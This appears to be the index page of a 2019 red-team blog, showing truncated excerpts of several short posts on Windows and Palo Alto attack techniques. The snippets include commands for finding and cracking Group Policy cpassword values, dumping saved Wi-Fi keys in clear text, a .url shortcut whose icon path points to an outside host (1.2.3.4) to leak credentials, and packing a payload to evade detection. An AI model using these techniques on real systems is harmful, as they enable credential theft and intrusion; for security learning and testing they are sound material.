by frank | Jun 28, 2019 | Palo Alto, Red team, Security
Each system, has its limits.The Palo Alto on the latest version (tested on 9.0.1), is checking only up to 21 fields for a coupe of username and password in the bloom field.Normal creds form with 20 hidden INPUT before the Username & Password field. This shows the...
by frank | Jun 28, 2019 | Blue Team, Red team, Security, Windows
Reading Time: < 1 minuteecho %logonserver% findstr /S /I cpassword \\xxDC01\sysvol\xxxdc01\policies*.xml crack cpassword with the default AES key...
by frank | Jun 28, 2019 | Misc, Red team, Security, Windows
pyinstaller -i toto.ico -w -F toto.py Medium article : https://medium.com/dreamcatcher-its-blog/making-an-stand-alone-executable-from-a-python-script-using-pyinstaller-d1df9170e263 Another one which I don’t agree, as yes, payload is undetected by execute will...
by frank | Jun 28, 2019 | Red team, Security, Windows
Analyse Windows Systeminfo output, and produce a lit of the vulnerabilities and possible only show which ones have exploitspython wesng.py –exploits-only...
by frank | Jun 28, 2019 | Red team, Security, Windows
Reading Time: < 1 minutegenerate a file toto.url with the following content [InternetShortcut] URL=https://www.google.com/ IconIndex=0 IconFile=\\1.2.3.4\leak\leak.ico Place the toto.url file on a sharedrive. Many workstations will try to get the ico...
by frank | May 16, 2019 | Red team, Security, Windows
Reading Time: < 1 minutenetsh wlan show profilenetsh wlan show profile name=”mywifi” key=clearor to get the whole list exported to a file powershell.exe netsh wlan show profiles|Select-String -Pattern ” User Profile”|ForEach-Object{echo...
Recent Comments